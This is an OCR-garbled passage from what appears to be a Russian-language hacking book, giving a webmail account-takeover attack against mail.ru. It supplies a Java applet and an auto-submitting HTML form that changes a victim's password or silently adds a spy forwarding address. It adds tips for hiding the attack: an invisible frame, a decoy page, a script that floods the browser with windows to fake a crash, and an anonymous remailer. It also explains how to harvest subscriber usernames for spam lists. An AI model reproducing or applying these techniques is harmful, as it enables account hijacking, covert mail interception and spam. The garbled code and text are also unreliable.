Раздел: Документация

0 ... 43 44 45 46 47 48 49 ... 169

<applet

code=readr.class

name=readrie

codebase=» nyTb /»

width=320

beight=240 >

<B> SET Java On</B>

</applet>

readr.java

(не забудьте отредактировать ПУТЬ )

import Java . applet .*; import j ava.awt.*; import java.net.*;

public class readrie extends Applet

{

public void paint (Graphics g)

{ try {

URL myURL=new URL (« nyTb editprofil . html») ; getAppletContext () . showDocument (myURL,» self») ;

} catch (Exception e) {

g, drawstring («Еггог», 10, }

} )

editprofil.html

(не забудьте отредактировать ИМЯ ПОЛЬЗОВАТЕЛЯ и НО-

ВЫЙ ПАРОЛЬ)

<html> <body>

<form

bin/modifyuseг?modify»>

<inputvalue=»

ЗОВАТЕЛЯ «>

<input type=»text» name=»RealName» value=»A. V. Komlni»>

<input type=»text»value=»»>

140

---

<input type=»password» name=»Password» value=» h0-ВЫЙ ПАРОЛЬ «>

<input type=»password» name=»Password Verifу» value=» новый пароль «>

<input type=checkbox name=»FIags . DoNotKeepMail» > He сохранять почту при пересылке<ьг>

<input<input

type=»reset» value=»BoccTaHOBMTb»>

</form>

<SCRIPT LANGUAGE=»JavaScript»>

document.forms[0].submit();

</script>

</body>

</html>

Письмо можно сформировать просто присоединением (attach) HTML-файла (в Netscape Messenger, например), содержащего необходимые теги.

Присоединенный в Messengere HTML-файл mail.ru откроет автоматически.

Как только абонент попытается прочитать письмо, выполнится апплет, и через несколько секунд форма будет отослана от имени жертвы. Вот, в принципе, и все. Пользователю присвоен новый пароль. Если мы хотим «просто подслушивать» пользователя, в значение полей Password необходимо внести 16 звездочек, а в поле Forward — куда отсылать копии. Это довольно рискованный вариант: пользователь может случайно заглянуть в настройки и заметить адрес.

<inputtype=»text»name=»Forward»

value=»spy addr@xxxx.zz»>

<inputtype=»password»name=»Password»

я ue-»****************-»>

<inputtype=»password»name=»Password Verify»

y 2.LlS = **r*:r * * * *

/

Макияж...

He стоит, конечно, проводить всю эту процедуру перед глазами пользователя (может, он еще не отключил подтверждение на отправку форм или успеет разглядеть и запомнить новый пароль).

Разумнее переадресовать апплет на какой-нибудь файл, содержащий frameset.

141

---

<FRAMESET COLS=»99%,1%»>

<FRAME src=images-3/»zastavka.html» NAME=»vl»>

FRAME src=images-3/»editprofile.html» NAME-»wl»> ,

где zastavka маскирует письмо под безобидную рекламу или дружеское письмо, a editprofileвыполняется в невидимом фрейме. По окончании смены паролей лучше сымитировать сбой, т. к. в течение сеанса пользователь может исправить пароль. В IE под Win 95/98, например, достаточно выполнить скрипт

open[«javascript:open(window.location)»),

приводящий к бесконечному размножению окон, требующему перезагрузки. Само письмо лучше отослать (на случай неудачи) от анонимной службы рассылки писем. На 06.01.2000 г. пример еще работал. Исходники на www.chat.ru/-avkvladru/mail/. Защититься от этой атаки, как всегда, просто. Отключить Java, а лучше отказаться от использования Web-интерфейсов. Тот же mail.ru предлагает и форвардинг и рор-сервера. Экономия на настройке приносит проблемы с безопасностью не только администраторам больших сетей, поверьте. Составляем список абонентов сервера

Заветной мечтой всех спамеров мира является список (база)

абонентов.

Недаром в их среде постоянно ходят слухи о каких-то почтовых серверах, поддерживающих команду finger... Также пару дней назад на форуме видел очередной крик души, если таковая еще жива:

«Нужна база е-мейлов по заграничным и Московским сайтам $$$ - Вася 02:53:36 06/1/2000 (0)»

Нередко почтовые Web-серверы могут «бесплатно» представить подобную информацию. Метод ее получения довольно прост. При легальной работе с почтовым ящиком запоминаем адреса CGI-скриптов, ответственных за смену и чтение параметров пользователей. Потом вызываем их без параметров (форм). Вполне вероятны ошибки в скриптах, при которых они отработают с последними занесенными (или использующимися в текущий момент) именами пользователей. Конечно, шансов на то, что параметры можно изменить, нулевые, а вот сообщение об ошибке доступа вполне может содержать имя пользователя, как это происходит на mail.ru.

При обращении к тому же «http://koi.mail.ru/cgi-bin/modi-

fyuser?modify* выдается сообщение вида:

142

0 ... 43 44 45 46 47 48 49 ... 169